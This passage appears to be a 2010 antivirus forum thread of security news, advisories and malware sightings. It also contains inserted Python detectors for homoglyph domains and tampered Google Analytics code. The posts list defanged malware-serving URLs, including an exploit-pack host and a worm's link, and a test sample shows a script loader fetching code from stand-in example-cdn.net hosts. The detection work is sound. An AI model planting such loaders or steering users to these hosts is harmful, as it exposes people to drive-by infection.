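                findings.append(f"'{shown}' ({to_ascii(shown)}) looks like {brand}")
    return findings


if __name__ == "__main__":
    # Constructed samples: Latin with one Cyrillic 'a', and an all-Cyrillic look-alike.
    for sample in ("www.paypal.com", "www.p\u0430ypal.com", "\u0440\u0430\u0443\u0440\u0430\u04cf.com"):
        print(to_ascii(sample), "->", analyze_host(sample) or ["no findings"])
```

The all-Cyrillic sample is the edge case worth remembering: a mixed-script check alone says nothing about it, because every letter is from one script; only the skeleton comparison against a brand list catches it.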
-
Hi malware fighters,
Biggest threat around USB worm: http://news.techworld.com/security/3223707/mcafee-usb-worm-is-biggest-pc-threat/
pol
-
Oracle Java SE and Java for Business are prone to a remote heap-based buffer-overflow vulnerability affecting the Java Runtime Environment (JRE).
Attackers can exploit this issue to execute arbitrary code within the context of the user invoking the JRE.
Versions prior to Java 5.0 Update 24 and Java 6.0 Update 19 are vulnerable.
http://url4.eu/3Xqok
-
Microsoft Confirms x64 Windows 7 Aero Vulnerability
Vulnerability in Canonical Display Driver Could Allow Remote Code Execution
http://www.microsoft.com/technet/security/advisory/2028859.mspx
:-X
-
Hi malware fighters,
Latest threats: http://security.technosoftcorp.com/ss/ss_index.htm
pol
-
Hi malware fighters,
Already 44 PHP leaks found: http://www.php-security.org/
pol
-
Hi malware fighters,
Notorious torrent site with malware: 3471018cfbd0f17899258e2b62a1dd61 2010-05-11 Eleonore Exploits pack IE6 24/41 (58.54%) TR/PSW.Zbot.185344.R Blocked UK hxxp://91.216.3.108/ca1/index.php
See: http://support.clean-mx.de/clean-mx/viruses.php?domain=91.216.3.108&submit=query
Still malicious, avast reports: hxtp://wepawet.cs.ucsb.edu/view.php?type=js&hash=3ebe99eb909fd7458dd245ccbc8c4615&t=1273536734 (do not click the link, it is flagged: a sign of JS:Pdfka-BT [Expl] has been found)
Norton Safe Web gives it green, but that is false: this is a dangerous site, it is blocked on Blade,
polonus
-
not really a warning but worth noting:
Google turns on SSL encryption for search
http://www.theregister.co.uk/2010/05/21/google_search_ssl_encryption/
(http://regmedia.co.uk/2010/05/21/google_ssl_search_logo.png)
http://googleblog.blogspot.com/2010/05/search-more-securely-with-encrypted.html
A few notes to remember: Google will still maintain search data to improve your search quality and to provide better service. Searching over SSL doesn’t reduce the data sent to Google — it only hides that data from third parties who seek it.
-
Fake joke worm wriggles through Facebook
http://www.theregister.co.uk/2010/05/21/fake_joke_worm_facebook/
The malware, for now at least, does nothing more malicious than posting a message on an infected user's Facebook wall that point to a site called fbhole.com. Nonetheless, the speed of its spread on the social networking site has net security experts worried.
The message that the worm posts takes the form:
try not to laugh xD http://www.fbhole. com/omg/allow.php?s=a&r=[random number]
Facebook gives users' names to advertisers
Violates own privacy policy
http://www.theregister.co.uk/2010/05/21/facebook_ads/
http://online.wsj.com/article/SB10001424052748704513104575256701215465596.html
-
Hi friends,
The fbhole.com attack ended in 15 seconds. Check out fsecure's weblog : http://www.f-secure.com/weblog/archives/00001955.html
nmb
-
Hi friends,
The fbhole.com attack ended in 15 seconds. Check out fsecure's weblog : http://www.f-secure.com/weblog/archives/00001955.html
nmb
LOL ;D
Updated to add: Domain fbhole.com shared an IP address with ironbrain.net [82.208.32.99]. Ironbrain.net hosted a website with references to Facebook but no obvious illegal content. While fbhole.com was registered with privacy protection, ironbrain.net had contact information in the WHOIS database, complete with a Czech phone number.
So I called the number.
The call went roughly like this:
– Hello?
– Hi. This is Mikko Hypponen from F-Secure Labs.
– What is this about?
– I'm looking for a person related to ironbrain.net.
– ???
– We're investigating a Facebook worm on fbhole.com. That domain shares an IP address with ironbrain.net which is registered under your name.
– And you are?
– I'm from an antivirus company. Are you related to ironbrain.net?
– I'll have to check… maybe my company is…
– Please do.
– Bye…
[Click]
About 15 seconds later, both fbhole.com and ironbrain.net went offline. The attack is over.
-
Hi malware fighters,
New malware trend: http://blog.unmaskparasites.com/2010/05/22/malware-on-hijacked-subdomains-new-trend/
polonus
-
IBM hands out malware-stuffed USB at security conference
http://www.theregister.co.uk/2010/05/21/ibm_usb_malware_snafu/
-
First human 'infected with computer virus'
(http://www.siliconrepublic.com/fs/img/news/201005/378x/computer-virus-image.jpg)
A British scientist says he is the first man in the world to become infected with a computer virus
Is he a humanoid?
Not as terrible as I thought
http://news.bbc.co.uk/2/hi/technology/10158517.stm
-
Facebook Apps hacked or exploited and is hosting HTML:Iframe-inf
Edit: I found this today and it is still active. Trying to connect Twitter with Facebook via Facebook Apps. Google Chrome is giving an alert, but the malware can be executed automatically by the server. avast is detecting & blocking it.
-
Facebook Apps hacked or exploited and is hosting HTML:Iframe-inf
more details may be? ;D
-
Facebook Apps hacked or exploited and is hosting HTML:Iframe-inf
more details may be? ;D
No info is available on the web so far, but I was notified by Google Chrome & avast
-
I think this is recent
-
could you try to reproduce it and post a screen shot of the alert in the virus/worm section? thanks ;)
-
could you try to reproduce it and post a screen shot of the alert in the virus/worm section? thanks ;)
I will try, but I don't have any tool to capture a screenshot, because I don't have my laptop at the moment. But I want to install one.
-
http://www.bhelpuri.net/Snippy/ (only works with XP or older versions of windows with GDI+ installed).
Vista should have a "snipping tool" already installed though.
http://windows.microsoft.com/en-us/windows-vista/Use-Snipping-Tool-to-capture-screen-shots
-
could you try to reproduce it and post a screen shot of the alert in the virus/worm section? thanks ;)
I will try, but I don't have any tool to capture a screenshot, because I don't have my laptop at the moment. But I want to install one.
you got a tool in Vista, it's called "Snipping tool" :)
-
Or you guys should start a new thread, may be?
nmb
-
Or you guys should start a new thread, may be?
nmb
why ??? I just warned a user that his system was equipped with a "snipping tool"...and that's a warning thread or not ??? ;D
-
I already did it though...
-
why ??? I just warned a user that his system was equipped with a "snipping tool"...and that's a warning thread or not ??? ;D
Buddy logos,
You got me wrong. Let's leave it here. Or else the topic gets hijacked.
cheers :)
nmb
-
I was just having fun :D
-
Hi malware fighters,
@logos
Well back to business then, I mean get the latest threats from here: http://blog.scansafe.com/
Interesting read for the latest exploits online,
polonus
-
Hi malware fighters,
@logos
Well back to business then, I mean get the latest threats from here: http://blog.scansafe.com/
Interesting read for the latest exploits online,
polonus
::) well thanks for the head ups then :D (not really into malware stuff right now... :P )
-
Hi malware fighters,
What about this threat? http://lists.clean-mx.com/clean-mx/viruses.php?domain=v3p2*com&sort=first%20desc
About what this site is into: http://blog.scansafe.com/journal/2010/5/12/possible-root-compromise-of-greatandhracom.html
Unmasked parasites: http://www.UnmaskParasites.com/security-report/?page=v3p2.com
pol
-
Hi malware fighters,
Be aware of the top trend search words. These could lead to fake AV links: http://www.spamfighter.com/News-14469-Hackers-Poison-Google-Search-Results.htm
So watch your clicks, folks..stay clear of poisoned Google search results...260 000 during 2009
http://news.idg.no/cw/art.cfm?id=983DCD85-1A64-67EA-E4B9D36C6D646C40
polonus
-
@ scythe944, Logos & nmb
The new topic is now available at:
http://forum.avast.com/index.php?topic=60230.0
-
Llanziel
Actually, you should have posted in here rather than starting another thread. :)
-
Perpetual Horizon's Mebroot analysis
Avast fails to detect.. :'(
Here you go : http://perpetualhorizon.blogspot.com/2010/05/trip-down-memory-lane-with-torpig-part.html
nmb
-
Hi :)
What The Internet Knows About You?
http://static.whattheinternetknowsaboutyou.com/results.html
-
A cunning new phishing technique - Tabnabbing
http://www.norman.com/security_center/security_center_archive/2010/80577/en-us
http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/
http://krebsonsecurity.com/2010/05/devious-new-phishing-tactic-targets-tabs/
-
Hi Pondus,
The latest version of the Fx NoScript extension has protection against TabNabbing,
polonus
-
Hi malware fighters,
Hackers are looking for older versions of Fx to hack them via specific exploit packs like Eleonore:
http://www.avertlabs.com/research/blog/index.php/2010/05/28/an-overview-of-exploit-packs/
http://www.malwaredomainlist.com/forums/index.php?topic=3354.0
http://www.malwaredomainlist.com/mdl.php?search=Eleonore&colsearch=Description&quantity=50
http://evilfingers.blogspot.com/2009/08/eleonore-exp-v12-russian-exploits.html
polonus
-
Hi malware fighters,
A new scareware: A-fasta: http://malwareint.blogspot.com/2010/05/recent-tour-of-scareware-xxii.html
polonus
-
Hi malware fighters,
A new scareware: A-fasta: http://malwareint.blogspot.com/2010/05/recent-tour-of-scareware-xxii.html
polonus
See:
What is A-Fast Antivirus?
http://forums.malwarebytes.org/index.php?showtopic=49893
-
Critical updates for Adobe Photoshop CS4
http://www.norman.com/security_center/security_center_archive/2010/80709/en-us
http://www.adobe.com/support/security/bulletins/apsb10-13.html
-
Hi malware fighters,
Keep an eye out for these malcode sites:
http://rss.uribl.com/nic/XIN_NET_TECHNOLOGY_CORPORATION.html
Knownsec gives some as confirmed clean or "evaluation results from other organisations": https://webmon.knownsec.com/report?id=1948293
Some detected as Trojan-serving sites: "website detected as hosting a trojan"
polonus
-
Mac Attack: see> http://www.theregister.co.uk/2010/06/01/mac_spyware/
-
Mac Attack: see> http://www.theregister.co.uk/2010/06/01/mac_spyware/
I share his opinion posted there:
Mac's most ardent supporters have long claimed the platform is more inherently secure than Windows, a perception Apple marketers have been happy to perpetuate. But a more plausible explanation, advanced by Charlie Miller and other white-hat hackers who regularly exploit Apple security bugs, is that the platform isn't sufficiently big enough to justify the investment of hardened crime gangs.
-
***
Mac Attack: see> http://www.theregister.co.uk/2010/06/01/mac_spyware/
I share his opinion posted there:
Mac's most ardent supporters have long claimed the platform is more inherently secure than Windows, a perception Apple marketers have been happy to perpetuate. But a more plausible explanation, advanced by Charlie Miller and other white-hat hackers who regularly exploit Apple security bugs, is that the platform isn't sufficiently big enough to justify the investment of hardened crime gangs.
This is the same that I have been saying for the past 10 years and this idea includes browsers as well as other less popular computer applications.
***
-
Hi malware fighters,
Facebook worm threat: http://www.sophos.com/blogs/gc/g/2010/05/31/viral-clickjacking-like-worm-hits-facebook-users/
Muslim jihad against facebook blasphemy groups: http://www.virtualjihad.net/
pol
-
Free Mac OS X screensavers bundled with spyware (http://www.zdnet.com/blog/security/malware-watch-free-mac-os-x-screensavers-bundled-with-spyware/6560?tag=nl.e589)
-
Muslim jihad against facebook blasphemy groups: http://www.virtualjihad.net/
interesting...
-
Hi malware fighters,
Sasfis trojan tricks Windows with new technique: http://blog.trendmicro.com/sasfis-malware-uses-a-new-trick/
polonus
-
Hi malware fighters,
Look for these fake-AV threats from blog sites: http://blog.trendmicro.com/doorway-pages-and-other-fakeav-stealth-tactics/
Recently spotted a couple in the virus and worms reported there...
pol
-
Not sure if this has already been posted
Removal instructions for Sysinternals Antivirus
http://forums.malwarebytes.org/index.php?showtopic=52821
-
I get this warning daily - and really do not know where it is coming from.
http://www.shemel.co.cc/le.php\{gzip}
-
Security Advisory for Flash Player, Adobe Reader and Acrobat
http://blogs.adobe.com/psirt/2010/06/security_advisory_for_adobe_re.html
A Security Advisory has been posted in regards to a new Adobe Reader, Acrobat and Flash Player issue (CVE-2010-1297). A critical vulnerability exists in Flash Player 10.0.45.2 and earlier versions for Windows, Macintosh, Linux and Solaris operating systems, and the authplay.dll component that ships with Adobe Reader and Acrobat 9.x for Windows, Macintosh and UNIX operating systems. This vulnerability could cause a crash and potentially allow an attacker to take control of the affected system. There are reports that this vulnerability is being actively exploited in the wild against both Adobe Flash Player, and Adobe Reader and Acrobat.
The Flash Player 10.1 Release Candidate available on http://labs.adobe.com/technologies/flashplayer10/ does not appear to be vulnerable.
Adobe Reader and Acrobat 8.x are confirmed not vulnerable. Mitigations for Adobe Reader and Acrobat 9.x are included in the Security Advisory.
-
Hi Alan Baxter,
With a penetration rate of 97% this is a gaping vulnerability risk and could affect millions and millions of computers, so go here to update: http://labs.adobe.com/downloads/flashplayer10.html#android
polonus
-
Hi Alan Baxter,
With a penetration rate of 97% this is a gaping vulnerability risk and could affect millions and millions of computers, so go here to update: http://labs.adobe.com/downloads/flashplayer10.html#android
polonus
Hi D.,
is this a stable release..??
asyn
-
Hi Asyn,
While waiting for a security update, users are advised to go and download the release candidate from
http://labs.adobe.com/technologies/flashplayer10 found here: http://labs.adobe.com/downloads/flashplayer10.html
It is stable enough,
pol
-
Hi Alan Baxter,
With a penetration rate of 97% this is a gaping vulnerability risk and could affect millions and millions of computers, so go here to update: http://labs.adobe.com/downloads/flashplayer10.html#android
polonus
Hi D.,
is this a stable release..??
asyn
yep, been using several successive beta and RCs of it for many weeks, no problem.
-
Hi Logos,
Thanks for confirming this, for our users. Secunia PSI cannot solve all our patching/upgrading problems.
And now has three bugs: http://www.theregister.co.uk/2010/06/02/secunia_bug_check_tool/
(only form a problem when you feed up wrongly yourself...)
polonus
-
Thanks guys..!! :)
asyn
-
Virtualjihad.net has been suspended. They served a ddos tool.
-
I have been using Flash RC from the day one when it was released....
I was just hoping that the statistics they glean from my PC can be of some use to make Flash better....
HTML 5 is the future...
-
More adobe........
Critical vulnerability in Adobe Flash Player, Adobe Reader and Acrobat
http://www.norman.com/security_center/security_center_archive/2010/83636/en
quote:
As of this writing no updates are available. There are reports that this vulnerability is being actively exploited.
-
Thank you, Pondus, but all that was reported here three days ago. In case you missed it, that report included information that the Flash Player 10.1 Release Candidate does not appear to be vulnerable and its immediate installation is recommended.
http://forum.avast.com/index.php?topic=52252.msg509931#msg509931
Security Advisory for Flash Player, Adobe Reader and Acrobat
http://blogs.adobe.com/psirt/2010/06/security_advisory_for_adobe_re.html
A Security Advisory has been posted in regards to a new Adobe Reader, Acrobat and Flash Player issue (CVE-2010-1297). A critical vulnerability exists in Flash Player 10.0.45.2 and earlier versions for Windows, Macintosh, Linux and Solaris operating systems, and the authplay.dll component that ships with Adobe Reader and Acrobat 9.x for Windows, Macintosh and UNIX operating systems. This vulnerability could cause a crash and potentially allow an attacker to take control of the affected system. There are reports that this vulnerability is being actively exploited in the wild against both Adobe Flash Player, and Adobe Reader and Acrobat.
The Flash Player 10.1 Release Candidate available on http://labs.adobe.com/technologies/flashplayer10/ does not appear to be vulnerable.
Adobe Reader and Acrobat 8.x are confirmed not vulnerable. Mitigations for Adobe Reader and Acrobat 9.x are included in the Security Advisory.
-
Hi Logos,
Thanks for confirming this, for our users. Secunia PSI cannot solve all our patching/upgrading problems.
And now has three bugs: http://www.theregister.co.uk/2010/06/02/secunia_bug_check_tool/
(only form a problem when you feed up wrongly yourself...)
polonus
Make sure you have Secunia PSI V1.5.0.2
http://secunia.com/vulnerability_scanning/personal
-
Hi malware fighters,
Targeted attack in an Excel document: http://www.symantec.com/connect/blogs/fifa-world-cup-used-lure-victims-targeted-attack
polonus
-
Hackers expose 114,000 iPad users through AT&T site
http://www.zdnet.co.uk/news/security-threats/2010/06/10/hackers-expose-114000-ipad-users-through-atandt-site-40089189/
A group of hackers exploited a hole in an AT&T website to get email addresses of about 114,000 iPad users, including what appears to be top officials in government, finance, media, technology and military.
-
Hi malware fighters,
To be protected against the facebook link invaders: http://forums.informaction.com/viewtopic.php?f=8&t=4454
polonus
-
Google finds serious hole in Windows XP: http://seclists.org/fulldisclosure/2010/Jun/205
polonus
-
Hi malware fighters,
SQL-mass infection reported - http://blog.sucuri.net/2010/06/mass-infection-of-iisasp-sites-robint-us.html
polonus
-
http://forum.avast.com/index.php?topic=52252.msg509931#msg509931
http://forum.avast.com/index.php?topic=52252.msg510668#msg510668
Critical vulnerability in Adobe Flash Player, Adobe Reader and Acrobat - UPDATED
http://www.norman.com/security_center/security_center_archive/2010/83636/en
-
Critical vulnerability in Adobe Flash Player, Adobe Reader and Acrobat - UPDATED
http://www.norman.com/security_center/security_center_archive/2010/83636/en
From the Flash Player site: Adobe recommends all users of Adobe Flash Player 10.0.45.2 and earlier versions upgrade to the newest version 10.1.53.64
I would remove all versions of Flash Player by using the Flash Player uninstaller:
http://kb2.adobe.com/cps/141/tn_14157.html
Make sure to have all browsers sessions closed when running the uninstaller and do a reboot to permit locked files to be removed.
http://get.adobe.com/flashplayer <== make sure that you un-select the Free Google Toolbar if you do not want it.
-
Critical vulnerability in Adobe Flash Player, Adobe Reader and Acrobat - UPDATED
http://www.norman.com/security_center/security_center_archive/2010/83636/en
From the Flash Player site: Adobe recommends all users of Adobe Flash Player 10.0.45.2 and earlier versions upgrade to the newest version 10.1.53.64
I would remove all versions of Flash Player by using the Flash Player uninstaller:
http://kb2.adobe.com/cps/141/tn_14157.html
Make sure to have all browsers sessions closed when running the uninstaller and do a reboot to permit locked files to be removed.
http://get.adobe.com/flashplayer <== make sure that you un-select the Free Google Toolbar if you do not want it.
Google toolbar no longer included in the installer, I think. I had problems last night of installing the new Flash plugin. Instead, I downloaded the Active X flash player which is for IE.
-
Google toolbar no longer included in the installer, I think. I had problems last night of installing the new Flash plugin. Instead, I downloaded the Active X flash player which is for IE.
It sure is.
I sure would modify my profile if I advertise that I am Granddadsgiant (at) aol.com
-
Vulnerability in Windows Help and Support Center Could Allow Remote Code Execution
http://www.microsoft.com/technet/security/advisory/2219475.mspx
-
Hi malware fighters,
Install the Fix it for this issue: http://support.microsoft.com/kb/2219475
Certainly soon there will be malware seen to exploit this for Windows XP SP2 & 3,
pol
-
Before using the fixit solution, make sure your System is vulnerable.
Vista and Win7 certainly aren't. :)
-
Before using the fixit solution, make sure your System is vulnerable.
How would someone do that?
Vista and Win7 certainly aren't. :)
Certainly soon there will be malware seen to exploit this for Windows XP SP2 & 3,
-
This should answer your question nmb
-
This should answer your question nmb
Sorry, Bob..!
But polonus' post did already refer to this... ;)
asyn
-
Hi Asyn,
Here is the MS page: http://www.microsoft.com/technet/security/advisory/2219475.mspx
There was some controversy over Google publishing this exploit,
pol
-
Hi Asyn,
Here is the MS page: http://www.microsoft.com/technet/security/advisory/2219475.mspx
There was some controversy over Google publishing this exploit,
pol
Run the FixIt. :)
-
Hi Asyn,
Here is the MS page: http://www.microsoft.com/technet/security/advisory/2219475.mspx
There was some controversy over Google publishing this exploit,
pol
Thanks D, already been there..! ;)
asyn
-
Run the FixIt. :)
Whom do you mean..?
asyn
-
Run the FixIt. :)
Whom do you mean..? asyn
Run it on your XP SP3 system and maybe your Comodo will even permit it.
-
Run it on your XP SP3 system and maybe your Comodo will even permit it.
No need, as
1. I don't need/run it
2. Block it anyway with comodo..! ;D
asyn
-
Hi malware fighters,
A new kind of malcoded adware, rather malware, may transform your laptop into a Wifi router to function as a laptop access point; the victim does not see the launched ads on every HTML page and also on YouTube. It is too easy to call this a normal "man in the middle" attack; we certainly will hear more about "Typhoid adware": http://pages.cpsc.ucalgary.ca/~aycock/papers/eicar10.pdf
polonus
-
SumatraPDF v1.1 Denial of Service PoC
http://www.exploit-db.com/exploits/13872/
nmb
-
Hi malware fighters,
A new trojan does not work under Windows XP, but will infect Vista: http://blog.webroot.com/2010/06/14/spammed-trojan-wont-run-under-windows-xp/
polonus
-
Hi malware fighters,
Google Analytics harbours new malicious script!
On a number of hacked websites eSoft found Google Analytics abused to harbour malicious scripts. The JavaScript code used normally uses the Google domain, but during decoding of the script a non-functioning 'src tag' is used, directing to a functioning 'src tag' with a malicious script on another domain. When analyzing these websites, look critically at the Google Analytics code, please: http://threatcenter.blogspot.com/2010/06/alert-to-web-security-researchers.html
pol
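Added example, not code from eSoft, the linked post or anyone in this thread: a Python script that does the check the post asks for, collecting every script on a page and flagging Google Analytics look-alike code whose script really comes from another host. Both HTML samples are constructed, one the genuine async snippet and the old urchin.js form, the other with its loader pointed at example-cdn.net hosts. An encoded loader has to be decoded before a check like this sees the real src, which is the part the post describes and this script does not attempt.

```python
"""Flag Google Analytics look-alike code that loads its script from a foreign host (added example)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

GA_MARKERS = ("_gaq", "_gat", "urchinTracker", "pageTracker", "ga.js", "urchin.js")
GA_FILES = ("ga.js", "urchin.js")
URL_RE = re.compile(r"""(?:https?:)?//[^\s'"()+]+""")  # URL literals inside inline JS


def is_ga_host(host: str) -> bool:
    """True only for google-analytics.com itself or one of its subdomains."""
    return host == "google-analytics.com" or host.endswith(".google-analytics.com")


class _ScriptCollector(HTMLParser):
    """Collect every <script> element as (src attribute or None, inline body)."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._current = [dict(attrs).get("src"), ""]

    def handle_data(self, data):
        if self._current is not None:
            self._current[1] += data

    def handle_endtag(self, tag):
        if tag == "script" and self._current is not None:
            self.scripts.append(tuple(self._current))
            self._current = None


def foreign_ga_hosts(html: str) -> list:
    """Hosts that GA-looking code loads from but that are not Google Analytics."""
    collector = _ScriptCollector()
    collector.feed(html)
    suspicious = set()
    for src, body in collector.scripts:
        # <script src="...ga.js"> pointing somewhere other than Google
        if src and src.split("?")[0].rsplit("/", 1)[-1] in GA_FILES:
            host = (urlsplit(src).hostname or "").lower()
            if not is_ga_host(host):
                suspicious.add(host)
        # inline GA snippet whose loader URL names a complete foreign host
        if any(marker in body for marker in GA_MARKERS):
            for url in URL_RE.findall(body):
                host = (urlsplit(url).hostname or "").lower()
                # the genuine snippet builds its URL from pieces ('https://ssl' + '.google-analytics.com'),
                # so fragments without a dot are not a host name and are skipped
                if "." in host and not is_ga_host(host):
                    suspicious.add(host)
    return sorted(suspicious)


# Constructed sample: what a clean page carries.
GENUINE_HTML = """
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-0000000-1']);
_gaq.push(['_trackPageview']);
(function() {
  var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
  ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
  var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
<script type="text/javascript">_uacct = "UA-0000000-1"; urchinTracker();</script>
"""

# Constructed sample: same shapes, loader redirected to hosts that are not Google's.
TAMPERED_HTML = """
<script src="http://stats.example-cdn.net/ga.js" type="text/javascript"></script>
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-0000000-1']);
(function() {
  var ga = document.createElement('script'); ga.async = true;
  ga.src = '//google-analytics.com.example-cdn.net/ga.js';
  document.getElementsByTagName('head')[0].appendChild(ga);
})();
</script>
"""

if __name__ == "__main__":
    print("genuine :", foreign_ga_hosts(GENUINE_HTML))
    print("tampered:", foreign_ga_hosts(TAMPERED_HTML))
```

The second tampered loader is the one to watch for: google-analytics.com.example-cdn.net contains the real name as a prefix, so a substring match would pass it, which is why the check compares the whole host and its parent domain instead.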
-
Linux trojan raises malware concerns
A backdoor Trojan discovered in a popular Linux download illustrates that the OS is not impervious.
http://pcworld.co.nz/pcworld/pcw.nsf/feature/1461D73DC2B51F96CC25774100750C6B
-
Linux trojan raises malware concerns
A backdoor Trojan discovered in a popular Linux download illustrates that the OS is not impervious.
Welcome to the club. :'(
-
Hi malware fighters,
The XP hole found by Google is now actively being abused, so apply the FixIt:
http://www.sophos.com/blogs/sophoslabs/?p=10045
pol
-
The XP hole found by Google is now actively being abused, so apply the FixIt:
http://www.sophos.com/blogs/sophoslabs/?p=10045
Done just now. Thank for for the update.
-
Disclose information about vulnerabilities? Yes/No/When?
http://www.norman.com/security_center/security_center_archive/2010/83782/en
-
dont put your money here
Eastern European banks under attack by next-gen crime app
http://www.theregister.co.uk/2010/06/16/blackenergy2_ddos_attacks/
Researcher shows how to strike back at web assailants
Exploiting the exploiters
http://www.theregister.co.uk/2010/06/17/exploiting_online_attackers/
-
Hi Pondus,
On the disclosure discussion front, i.m.o. the best remedy is to educate users to be fully protected against possible 0-days. That is to make use of appropriate in-browser protection like NS and RP (so code can not run and malicious requests are not being performed), use a normal user account so an exploit can not be maximized on the OS and in the registry. Use a combination of a fully upgraded resident AV solution together with some additional non-resident malware scanners (MBAM, SAS etc.) and check with Secunia's PSI for instance whether all third party software has been fully updated and patched.
As long as users are not educated into these precautionary practices the discussion between full, semi or responsible disclosure is a non-issue because the average user will still be a sitting duck for malcreants and cybercriminals alike,
polonus
-
Hi Pondus,
On the disclosure discussion front, i.m.o. the best remedy is to educate users to be fully protected against possible 0-days. That is to make use of appropriate in-browser protection like NS and RP (so code can not run and malicious requests are not being performed), use a normal user account so an exploit can not be maximized on the OS and in the registry. Use a combination of a fully upgraded resident AV solution together with some additional non-resident malware scanners (MBAM, SAS etc.) and check with Secunia's PSI for instance whether all third party software has been fully updated and patched.
As long as users are not educated into these precautionary practices the discussion between full, semi or responsible disclosure is a non-issue because the average user will still be a sitting duck for malcreants and cybercriminals alike,
polonus
+1 (100% agree..!!!)
asyn
-
guys stop dreaming, the average user will never ever use NS or similar, never. The average user wants his box to run like a TV, turn on, zap, turn off...browse the web, check hotmail, and basta. It's already hard to make them understand that they need an anti-virus at all (most of them running nothing, because the Norton trial expired ;D )....there's no such thing as educating the masses about computer and internet security. The masses are purely and simply rejecting the ideas: that 1st the web is not secure, and second that they need to be educated for their own sake. It's a dead end. Show user lambda that his system is infected, he'll still wonder why there's a need to clean it...not a joke ;)
-
guys stop dreaming, ... <snip>
Never stop dreaming..!! ;)
asyn
-
Hi Logos,
Still we have to go on educating, just for the guys and gals and kids that will pick this up, weren't we a bit like average users when we started out here. How many computers do you need that have been turned into a state of "no better than a door stopper" by malcoded script to finally glimpse at the idea that it is a PEBKAC problem mainly, and you can do something fundamentally about it. If I can get 100 users to further use NS and RP combined I feel a better human being for doing so,
polonus
-
From Omids`s Blog
A little note to the guys at ESET http://boelectronic.blogspot.com/search/label/Fun
-
Go Omid! I liked the Windows updates thing in those earlier posts. I'm planning on 2012 ending for XP network followed by upgrade to whatever is best option then. Whenever the security updates cannot be kept up to cover potential or real vulnerabilities. I've got two years avast! Pro on an XP Pro 32bit so I'll take my XP that far.
-
also from Omid's blog
Watch out for this dangerous hacker.....he may erase your hard drive.......... ;D ;D ;D
http://whatthehell.eu/hacker-story
-
Hi Pondus,
And what would you think of this, malcreants signing their malcode with MS Authenticode, certified malware, who would believe this?
http://www.f-secure.com/weblog/archives/00001973.html
So look out, you good people, it is a nightmare out there or soon to be,
polonus
-
also from Omid's blog
Watch out for this dangerous hacker.....he may erase your hard drive.......... ;D ;D ;D
http://whatthehell.eu/hacker-story
Must be DST... ;D ;D ;D ;D ;D...
-
Testing Reveals Security Software Often Misses New Malware
http://www.cio.com/article/597263/Testing_Reveals_Security_Software_Often_Misses_New_Malware?taxonomyId=3089
-
Testing Reveals Security Software Often Misses New Malware
http://www.cio.com/article/597263/Testing_Reveals_Security_Software_Often_Misses_New_Malware?taxonomyId=3089
Then there are those that feel the sky is falling ::)
There needs to be a sanity check! ???
-
***
Misplaced warning at this link :
http://forum.avast.com/index.php?topic=61138.msg516039#msg516039
***
-
***
Misplaced notice at this link :
http://forum.avast.com/index.php?topic=61279.msg517655#msg517655
***
-
Critical updates for Adobe Acrobat and Reader
http://www.norman.com/security_center/security_center_archive/2010/84420/en
-
Hi malware fighters,
In Amsterdam a couple of important HTTP-protocol flaws will be revealed: the vulnerabilities are for all programs and services that make use of the HTTP-protocol, e.g. Internet Explorer, Firefox, Microsoft Office, but also Twitter, Hotmail, Facebook and iPhone Apps. MS and Facebook could mend these flaws in their code, but closing the holes for the HTML-protocol itself won't be that easy and swift a task...
So that is why I use HTTPS-everywhere extension inside the Mozilla browser for now, NoScript will protect the user as well, so all my search queries go via encrypted.google.com, my good friends,
polonus
-
Using HTTPS stops avast from being able to scan your web activity.
At this point, I'd rather depend on avast! to protect me. :) (This is my opinion)
-
Using HTTPS stops avast from being able to scan your web activity.
At this point, I'd rather depend on avast! to protect me. :) (This is my opinion)
Couldn't agree more, why use the web shield if you are going to cripple it by using an add-on to use https.
Not to mention a point polonus makes that NoScript also protects you to a degree in firefox, by switching to https you are actually reducing that effectiveness as the rules in NS by default are different for https (active content in https connection, see image). So not only are you blocking avast you are also reducing the effectiveness of noscript, a poor swap in my opinion.
-
DavidR,
The avast shields keep working I guessed, the https everywhere is only for a couple of sites that give this additional service (alas google via encrypted.google, because of the school filter circumvention issue), it would be a sad thing indeed that we weren't protected on/via https connections. Is that so? I have the extension now disabled for the mo, but like to hear a bit more on the issue why https is not protected by avast via their port 12080 shield connection,
polonus
-
It isn't only for a couple of sites and they are looking at adding other sites, not to mention some of the sites they do include notably facebook (I believe, or some such social networking site/s), which are large targets for malware.
It is a simple fact https is encrypted and the web shield can't monitor/scan encrypted traffic so it doesn't even try. So you lose that level of protection on https pages, it may well be picked up by the file system shield, but that isn't assured and certainly not any hacked site, redirect, exploit issues.
You only need monitor the web shield whilst browsing an https site and you will see zero scanning of https pages/content. Why do you think I have been banging on about it every time you mention this add-on.
-
The avast shields keep working I guessed...
polonus
I'm surprised to hear that from you Pol...how do you want to scan encrypted traffic :) remains that the file shield will interact at disk level...but hey that's not the same level of protection anymore ;) This said there's no risk surfing on https on a few sites (allowing it), I do that myself, on twitter for instance, where there's nothing hosted >>> if malware is linked there it's out of twitter, so the webshield will interact again. I'd be more careful with Facebook (that I hate anyway), because stuff is hosted there, so yes there are definitely some sites where ssl is not advised at all.
The main point of using ssl is to get the privacy that you can't get on http in the case that bad guys would be eavesdropping the network...but the downside is that "malwarewise", you're almost on your own there.
ps: but again, I think switching to ssl is fine on a very restricted number of sites, like Google docs (on your account) and as a rule on nothing shared from another account.
-
Hi guys!
One question,
Is Google search exploited, or is a FP from avast!?
my avast! found on many occasions a JS-ScripIP-inf trojan trying to download to my computer when I make searches through Google.
iRanzel
attach: report file from Web Shield
-
Hi iRanzel,
It is w\Xw.google.com.pr that has been hacked: it's the Peace Crew, formerly known as Terrorist Crew, a group of politically motivated hackers supporting the Palestinian cause, who recently defaced the Microsoft New Zealand sites. Earlier this year, they attacked a number of Nato and US military websites.
The principal Peace Crew character is a hacker known as Agd_Scorp, allegedly of Turkish origin. Other prominent members are rx5 and Cr@zy_King.
